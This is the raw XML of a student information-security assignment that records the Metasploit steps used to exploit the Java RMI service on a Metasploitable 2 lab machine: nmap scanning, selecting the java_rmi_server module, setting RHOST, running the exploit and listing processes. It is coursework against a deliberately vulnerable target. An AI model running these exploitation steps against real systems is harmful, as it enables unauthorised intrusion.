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5A675C" w14:textId="0B81432B" w:rsidR="00237F7E" w:rsidRPr="00840180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840180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>FORMAN CHRISTIAN COLLEGE (A CHARTERED UNIVERSITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C147B" w14:textId="77777777" w:rsidR="00237F7E" w:rsidRPr="00355C14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EA8748" w14:textId="77777777" w:rsidR="00237F7E" w:rsidRPr="00355C14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D548B68" w14:textId="77777777" w:rsidR="00237F7E" w:rsidRPr="00355C14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5C14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2048C97" wp14:editId="33926F32">
            <wp:extent cx="2194560" cy="2049780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="Picture 13" descr="A blue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blue and white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4DBBD" w14:textId="77777777" w:rsidR="00237F7E" w:rsidRPr="00355C14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11ED307" w14:textId="2DDE008C" w:rsidR="00237F7E" w:rsidRPr="00840180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40180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>OMP421</w:t>
      </w:r>
      <w:r w:rsidRPr="00840180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26928691" w14:textId="61945299" w:rsidR="00237F7E" w:rsidRPr="00840180" w:rsidRDefault="00237F7E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40180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33453F98" w14:textId="0181CC26" w:rsidR="00237F7E" w:rsidRDefault="00237F7E" w:rsidP="008438A7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840180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Assignment-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B818F24" w14:textId="77777777" w:rsidR="008438A7" w:rsidRPr="008438A7" w:rsidRDefault="008438A7" w:rsidP="008438A7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11F083E" w14:textId="76347F8E" w:rsidR="00237F7E" w:rsidRPr="00355C14" w:rsidRDefault="00C43500" w:rsidP="00237F7E">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing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ajra Mujahid 251707426</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDF486" w14:textId="645D40E7" w:rsidR="00237F7E" w:rsidRDefault="00237F7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688FC7CA" w14:textId="6EF08378" w:rsidR="008438A7" w:rsidRDefault="008438A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF092CC" w14:textId="77777777" w:rsidR="008438A7" w:rsidRDefault="008438A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5E14F0" w14:textId="46561806" w:rsidR="00237F7E" w:rsidRDefault="00237F7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE47A0A" w14:textId="77777777" w:rsidR="00237F7E" w:rsidRDefault="00237F7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2E2C3E" w14:textId="651492FF" w:rsidR="008438A7" w:rsidRPr="008438A7" w:rsidRDefault="008438A7" w:rsidP="008438A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mands used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A9D72" w14:textId="014E7D6B" w:rsidR="000D263A" w:rsidRPr="00C43500" w:rsidRDefault="000D263A" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68E5BBFD" w14:textId="05827152" w:rsidR="000D263A" w:rsidRPr="00C43500" w:rsidRDefault="000D263A" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008438A7" w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.231.108</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841F7C1" w14:textId="7E0BC3CE" w:rsidR="008438A7" w:rsidRPr="00C43500" w:rsidRDefault="008438A7" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Search exploit </w:t>
      </w:r>
      <w:r w:rsidR="00C43500" w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C43500" w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14052A62" w14:textId="2537B471" w:rsidR="00C43500" w:rsidRDefault="00C43500" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43500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C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6512076C" w14:textId="0A8709D5" w:rsidR="00C43500" w:rsidRPr="00C43500" w:rsidRDefault="00C43500" w:rsidP="000D26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w options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6662E" w14:textId="4BE7BB31" w:rsidR="008438A7" w:rsidRPr="00C43500" w:rsidRDefault="008438A7" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST 192.168.231.108</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C13F2" w14:textId="6A318A19" w:rsidR="008438A7" w:rsidRPr="00C43500" w:rsidRDefault="008438A7" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F5BDC" w14:textId="7FFE011B" w:rsidR="008438A7" w:rsidRDefault="008438A7" w:rsidP="000D26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43500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E7D5B73" w14:textId="65EF9FDB" w:rsidR="00C43500" w:rsidRPr="00C43500" w:rsidRDefault="00C43500" w:rsidP="00C43500">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4350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D48121" wp14:editId="42FFCC38">
            <wp:extent cx="5943600" cy="11645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38854" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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669AC5" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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02F0532" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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290A8F" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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F9E8940" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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8BA7DD" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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480148D" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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BE7CAE4" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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AB23DA8" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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17A6A6" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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743CC7" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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60F738" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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C37D761" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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0B4A683" w14:textId="77777777" w:rsidR="00BA2C76" w:rsidRDefault="00BA2C76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4A5830" w14:textId="454E8798" w:rsidR="00044A15" w:rsidRDefault="00044A15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37F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>List of processes on METASPLOITABLE 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B20B2F" w14:textId="49D00828" w:rsidR="00C43500" w:rsidRDefault="00C43500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3500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7FD2051" wp14:editId="0C1A9D13">
            <wp:extent cx="4738951" cy="6339840"/>
            <wp:effectExtent l="0" t="0" r="508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41554" cy="6343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5D2A7" w14:textId="0E01B676" w:rsidR="00C43500" w:rsidRDefault="00C43500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3500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FE97A82" wp14:editId="15AC4C8F">
            <wp:extent cx="5943600" cy="50761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17C4B" w14:textId="5C2D39C3" w:rsidR="00C43500" w:rsidRDefault="00C43500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3500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70A5C67" wp14:editId="21E5D56A">
            <wp:extent cx="5943600" cy="509651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DE08E" w14:textId="0F6F697B" w:rsidR="00BA2C76" w:rsidRPr="00C43500" w:rsidRDefault="00BA2C76" w:rsidP="00044A1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A2C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02E418A" wp14:editId="053ECD93">
            <wp:extent cx="5943600" cy="232156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A2C76" w:rsidRPr="00C4350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C4B188" w14:textId="77777777" w:rsidR="00716A9A" w:rsidRDefault="00716A9A" w:rsidP="00237F7E">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7371884D" w14:textId="77777777" w:rsidR="00716A9A" w:rsidRDefault="00716A9A" w:rsidP="00237F7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41E297" w14:textId="77777777" w:rsidR="00716A9A" w:rsidRDefault="00716A9A" w:rsidP="00237F7E">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EA4435E" w14:textId="77777777" w:rsidR="00716A9A" w:rsidRDefault="00716A9A" w:rsidP="00237F7E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E007FF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC2C3BD4"/>
    <w:lvl w:ilvl="0" w:tplc="A9BE838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B615CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C509E6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5916843">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="19398681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xMDQzMTAxMTU3tzBX0lEKTi0uzszPAykwrgUAqsncJSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00044A15"/>
    <w:rsid w:val="00044A15"/>
    <w:rsid w:val="000D263A"/>
    <w:rsid w:val="00237F7E"/>
    <w:rsid w:val="002C6C60"/>
    <w:rsid w:val="003646E8"/>
    <w:rsid w:val="004831E8"/>
    <w:rsid w:val="005913C2"/>
    <w:rsid w:val="005D797A"/>
    <w:rsid w:val="006474C8"/>
    <w:rsid w:val="006B3970"/>
    <w:rsid w:val="00716A9A"/>
    <w:rsid w:val="00833157"/>
    <w:rsid w:val="008438A7"/>
    <w:rsid w:val="00844992"/>
    <w:rsid w:val="00B60092"/>
    <w:rsid w:val="00BA2C76"/>
    <w:rsid w:val="00C43500"/>
    <w:rsid w:val="00D247FA"/>
    <w:rsid w:val="00E55F16"/>
    <w:rsid w:val="00F61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AE2FD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{28BCD199-778F-4175-8FBF-74106CDEC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5F1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7F7E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237F7E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00237F7E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237F7E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008438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image" Target="media/image1.jpeg" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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image" Target="media/image5.png" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" /><Relationship Id="rId14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mina Asad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hajramujahid820@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-30T13:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T13:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>